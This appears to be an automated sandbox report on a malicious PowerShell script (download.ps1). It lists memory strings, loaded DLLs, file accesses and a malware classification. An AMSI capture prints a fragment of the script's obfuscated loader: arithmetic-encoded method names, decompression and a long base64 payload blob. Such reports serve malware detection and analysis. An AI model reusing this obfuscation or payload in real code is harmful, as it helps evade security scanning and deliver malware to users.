Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basejs:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qAX
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u=/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,dX
Source: powershell.exe, 00000000.00000002.2222603419.000001AE102F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2222603419.000001AE101FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2195883968.000001AE00DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2222603419.000001AE101D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2222603419.000001AE10001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: else top.location='/doodles/';};})();</script><input value="AL9hbdgAAAAAZ2WqpjibR4A3f7NRc4tqmN5bEBOAl5sm" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="left" nowrap="" width="25%"><a href="/advanced_search?hl=en&amp;authuser=0">Advanced search</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"><script nonce="smbdIYF5IF9vEWyRIGM7rw">(function(){var a,b="1";if(document&&document.getElementById)if(typeof XMLHttpRequest!="undefined")b="2";else if(typeof ActiveXObject!="undefined"){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&location.search.indexOf("&gbv=2")==-1){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br><div id="K7FuCf"><style>.U8K5Lc{font-size:small;margin-bottom:32px}.U8K5Lc a.qDTOof{display:inline-block;text-decoration:none}.U8K5Lc img{border:none;margin-right:5px;vertical-align:middle}</style><div class="U8K5Lc" data-ved="0ahUKEwj528LE47aKAxX8aPUHHTtsC80QnIcBCAU"><img alt="" height="32" src="https://www.google.com/images/hpp/gemini-spark-icon-dark-mode-2-42px.png" width="32"><a href="https://www.google.com/url?q=https://blog.google/products/gemini/google-gemini-ai-holiday-planning-2024/%3Futm_source%3Dhpp%26utm_medium%3Dreferral&amp;source=hpp&amp;id=19046184&amp;ct=3&amp;usg=AOvVaw0wTMtITXLpc8KeH3Y4fICW&amp;sa=X&amp;ved=0ahUKEwj528LE47aKAxX8aPUHHTtsC80Q8IcBCAY" rel="nofollow">5 ways Gemini can help during the Holidays</a></div></div></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2024 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="smbdIYF5IF9vEWyRIGM7rw">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="smbdIYF5IF9vEWyRIGM7rw">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuac
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg'
Source: classification engineClassification label: mal68.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6088:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d5a3a2a2.4fs.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $rleh0swqxu8v617.(([system.String]::new(@((466387/(39594168/5688)),(-5580+(8629-(4098510/1395))),(-9468+(22541740/2353)),(4595-4474),(846636/10079),(74814/674)))))( $8o670ckbwifesz9 ) $rleh0swqxu8v617.(([char[]]@((4063-3996),(274212/(24607988/(43313548/(40167372/8988)))),(9863-(11607-1855)),(8285-8170),(8900-(-632+(70543880/(506+6974))))) -join ''))()$ko9qcp4ehnibsyw.(([system.String]::new(@((1291-1224),(180-(390456/(40867728/7536))),(-8193+8304),(9966-(2491+(4820+2540))),(4716-(7490-(13578625/(21291284/(14293-(22446790/2294))))))))))()[byte[]] $o5ilj12fkps9y0b = $8o670ckbwifesz9.(([char[]]@((-8403+(7023+1464)),(3908-(3232+(3034-2469))),(-3452+(1502+(-7240+9255))),(-572+686),(673398/5907),(3073-(17844096/5996)),(37+(7393-7309))) -join ''))() $yvoshkgni4d5ajl=$o5ilj12fkps9y0b return $yvoshkgni4d5ajl}[System.Text.Encoding]::ascii.(([char[]]@((73982/1042),(-1220+1321),(-257+(-8994+(7449+1918))),(3005-(1457+(2364510/1614))),(-3149+3265),(-5438+5552),(2545-(-3255+5695)),(1005620/9142),(1010533/9811)) -join ''))((m0x37uqa16toeih8ljnvspyz9rb "Lup+bHdzbWZgctTxbA5qOwX1wkWkjRgKAdpFBcCJERk8YsuqF/rdgHWCKEhoUdmCoEn/ThL53wK9jJYT71tLeB76Rl89Ca7+t1Kry7jaF1nOGMfSxuSLF4OXgYS1g6C9Fs4okAOPmYvH+e61zpGGBIgFEpSemJCvyKizlaKNgLPn0V4Fx84o8uvt0FsayoTlzLSK81iMEZeGl5LBzIRBO7AkwjmJnBZVR8iNt46qqLWXv48l6oyaJ+0xhN3LxAoEFC6thCrYUIIB6SplAo7+TTmoc9qP11QxLip4H5rCgIr73c9HpLF9015eIl/R2G7XQgQYUYQ0U1bjrg1hH/3QivUtm5rSl7wdnt67zYJaVFFyYIP+RGaLScGxOIsuXwNEK93gNwz8uBeznBtiBE/XnE3MjcupyzxVR9opWgjK1ZqTkeq5yA758po8w1BbHcdXCFzIkJmbElDbnA9dhkPD+JEepbpcdmfewL0FhNapLrDyj8VH5OQf9zQAHmy9qRYML1TCpUzs2ZyOKgQIbF+MiqqRHrDfCNQH38Se9QUY8HOO9Qd5o/7NYzIMQ1NBxc0CpoPk1VFOzpVFvUcSirXqFYDHQLihy2zRSW4rF0Z0ojeh5pKuCLSUCkHMIprF3x6vVooitZE8gKqf/6AGei4HQtoZINedTr6A95sOQVpfUI+2zz1dxHsDPk61XYGEn3E51w3B8cC8UTuwSHMLk7nc6KjF2l4xzRcNHsDGkUvhMFLglt96ojxeqruoDocEDnZ8SvxbTyEYo+vnO9Cu8YfxtgqcpOilZ4TouUM2EQdWOxj7gC0wGNqrTf+UMx3/CJK/z4P8ok41W/Q/G0Z5qilu1tKF/6EDSOK07bMlQ2Gv5D2xnr4rpw2n9X+QN3NiN7aduDypEQacuP3DJV7N6sLdp6CIsKk7roLNrg6SlRGtkta9HGLxDZaQG+scw9fTkOzyVQx+Av5dHdjfLU5VLlzIUIiaiYqd4T6lb385Y44XIbOVtLsLwZ7G+CW4A7z2N5WAjSxXeUoZS7AcJhvmrBG8amgp9i6owxyZp52F6dcVhjtDHcNNFiPFwZbE3Jey4kMD0Omn6UKIhYB+GJwcNS3atmIFRul3CskTRdhJEokTno2jbKAc0sJ5qM3L5ZGgKp+iuO8oL6bCnWoIcR6HIsBHh0Y79zadLbMggJ1vmwoPEZCOkU6Mc7CNOnTbjDtuToz2WpCy/AebixOdraiP6qZZcyrOFt5R1oeFJi6hn6gPccdJWseX31o3GHLieeBagdr6GXIfMgFwCAXUSrLfiEhgC6/oLv/3KXjdKDPiPk+fJ1huU9KNnbh+c79uMmAmg+iOCHopD3rNQV9ACQ5EIC8mQMNHyvhIn6GeiDS9Fyp2sWrZAYe0Z2SG/LoPWdH9R+tgzcl/aNvS6Lsed/oF8S7vdVEdXvhNFDvkGYexAsBqXZKjTXu/7t+MhaKmk6OZHddErv9JlZmYwqmTHX22iMR2/Ru6EebuwVy/XX6QJCMwRz99u4NYminHHJyz4HvL8oghQ1TYUGGpsR48z+IXJJPkML1wHVCx2+wfwH9KjS3NuWxHX7Qf6kiuzQEdolOIHgE5BjmhXdI9e6c9YiFfr/s9o5f2RriKP5P6PhTmzec2xAVPyfyv0XUKpH3JhmQ0Kg3AEIWHaLaa2HJZU+uguXGA85xqKaegH89C0Harf8++4/Y0fGiwQDAJp+ovehLeZMAt3UhdrpcL/+ybfIlJ7iWpsPk3aioHLTpFubuOzYInYzczuNdAI2k8Lnf93k3g1pzYaqExaC7oTny9nAhwsVwXc/Yutk3E/6FecZf7DFTj+2J13Z57zN3Y29Biieb4bwogC4+cAUCVN+X/GPLpajl8+1RNf81
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbd?? source: powershell.exe, 00000000.00000002.2234928744.000001AE719A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2237767209.000001AE71D77000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.2237767209.000001AE71D77000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.2237767209.000001AE71D77000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb@<+ source: powershell.exe, 00000000.00000002.2237767209.000001AE71D77000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2237767209.000001AE71DDD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2237361867.000001AE71D04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2234928744.000001AE719A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbh<S source: powershell.exe, 00000000.00000002.2237767209.000001AE71D77000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: gement.Automation.pdb source: powershell.exe, 00000000.00000002.2236363325.000001AE71C3C000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848E2D2A5 pushad ; iretd 0_2_00007FF848E2D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F465B7 push esp; retf 0_2_00007FF848F465B8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F400BD pushad ; iretd 0_2_00007FF848F400C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8491F7158 push edx; retf 0_2_00007FF8491F71CB

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
